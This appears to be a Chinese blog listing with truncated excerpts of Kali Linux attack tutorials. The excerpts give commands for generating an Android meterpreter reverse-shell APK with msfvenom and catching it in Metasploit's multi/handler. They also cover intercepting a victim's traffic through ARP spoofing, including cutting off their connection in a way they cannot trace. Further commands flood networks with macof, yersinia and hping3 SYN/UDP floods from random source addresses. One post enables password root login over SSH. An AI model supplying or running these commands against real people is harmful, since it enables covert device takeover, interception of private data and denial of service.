AinUser的博客

# 步骤0. 首先得确保连接同一个wifi，处于同一个网络中1. 创建一个apkmsfvenom -p android/meterpreter/reverse_tcp lhost=192.168.2.116 lport=9999 R > /root/520.apk2. 开始操作 2.1. 启动msfconsole msfconsole 2.2. 加载模块 use exploit/multi/handler .

# 思想主要使用了arp欺骗，使得用户上网先通过你的kali，之后通过kali转发给对应的网关# 其他应用既然我们kali，处于中间人，那么用户所操作的所有数据，我们都可以获取到，这里你们可以自由发挥其次也可以只操作第一步，通过arp欺骗，让用户电脑没网，任他大罗神仙来了，也找不出来原因因为只要我们的kali中间人，ping不通百度，那么，用户就无法上网# 实现步骤1. 开启arp欺骗arpspoof -t IP 网关arpspoof -t 192.168.2.113 .

# 情境通过桌面版的kali，进行操作的时候，有时候拷贝命令的时候，感觉很不方便还是使用我们常用的黑窗口，比较亲切一些# 解决1. 打开配置文件sudo vi /etc/ssh/sshd_config2. 修改配置将 #PermitRootLogin prohibit-password 修改为 PermitRootLogin yes将 #passwordAuthentication 修改为 passwordAuthentication之后保存退出3. 重启服务service .

# 常见的DOS攻击方式1. mac floodmacof2. dhcp flood2.1. 安装命令工具apt-get install -y yersinia2.2. 打开工具客户端yersinia -G2.3. 开始dhcp-flood攻击查看图1-13. TCP SYN floodhping3 --flood -S --rand-source -p 9999 192.168.2.14. UDP floodhping3 --flood --udp --rand-sour.